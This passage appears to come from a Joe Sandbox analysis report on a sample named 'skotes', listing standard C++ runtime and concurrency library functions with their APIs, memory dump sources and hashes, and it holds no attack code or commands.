                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3403738998-0
                                                                                                                                                                    • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                    • Instruction ID: 6b0e320135283b524cc18a2f4a409b0714a007ad065c7aef39ff4d070911bde2
                                                                                                                                                                    • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                    • Instruction Fuzzy Hash: 73513E71A00219ABDB04DF64C995BEDB7B9BF08304F158069E916AB381DB30AE45CFD0
                                                                                                                                                                    Function 006452A5 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 006453A0
                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 006453C7
                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 006454D3
                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 006455AE
                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00645650
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                    • API String ID: 4162181273-393685449
                                                                                                                                                                    • Opcode ID: 4aba84721764bf17ac2d1371e8fb58f3c97ad0bb4d3de3820d7264c828fa20bf
                                                                                                                                                                    • Instruction ID: 5fad8954b6130ce9900a5ab3b04c48432d74865b025d597a5b2ac4483bda384d
                                                                                                                                                                    • Opcode Fuzzy Hash: 4aba84721764bf17ac2d1371e8fb58f3c97ad0bb4d3de3820d7264c828fa20bf
                                                                                                                                                                    • Instruction Fuzzy Hash: 85C17671900A09EFCF29EFA4D881AEEBBB7BF14311F14415AF8066B212D771DA51CB91
                                                                                                                                                                    Function 00644840 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00644877
                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0064487F
                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00644908
                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00644933
                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00644988
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                    • String ID: S9d$csm
                                                                                                                                                                    • API String ID: 1170836740-3506811540
                                                                                                                                                                    • Opcode ID: e8dd16c420fedaed4dd0f5e7095f416c8aaa3855bac8ce8311f5bfbdb9baecae
                                                                                                                                                                    • Instruction ID: a70604e49bfa4196f9a9def99d72aa304863cdfc69cb94704aab03cbebd23693
                                                                                                                                                                    • Opcode Fuzzy Hash: e8dd16c420fedaed4dd0f5e7095f416c8aaa3855bac8ce8311f5bfbdb9baecae
                                                                                                                                                                    • Instruction Fuzzy Hash: BA41D634A00209AFCF10DF68C886B9E7BB6AF45318F148159E819AB392DB71DE55CF91
                                                                                                                                                                    Function 00637364 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 006373B0
                                                                                                                                                                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 006373F2
                                                                                                                                                                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0063740E
                                                                                                                                                                    • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00637419
                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00637440
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                                                                                    • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                    • API String ID: 3897347962-3650809737
                                                                                                                                                                    • Opcode ID: 60c7d22cc8a8110f987f9eed234453ffa1e1102f31522fd6c145705f279495db
                                                                                                                                                                    • Instruction ID: 59989b1567bfe9a4afc17943284e98536a8a1fb9ec341d518b3c473cb1197fde
                                                                                                                                                                    • Opcode Fuzzy Hash: 60c7d22cc8a8110f987f9eed234453ffa1e1102f31522fd6c145705f279495db
                                                                                                                                                                    • Instruction Fuzzy Hash: B9218274A00219AFDB10EF54D995AEDBBB6FF09310F1440A9E801A7351CB30AE11CFD4
                                                                                                                                                                    Function 0062EE5F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _SpinWait.LIBCONCRT ref: 0062EEBC
                                                                                                                                                                    • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0062EEC8
                                                                                                                                                                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0062EEE1
                                                                                                                                                                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0062EF0F
                                                                                                                                                                    • Concurrency::Context::Block.LIBCONCRT ref: 0062EF31
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
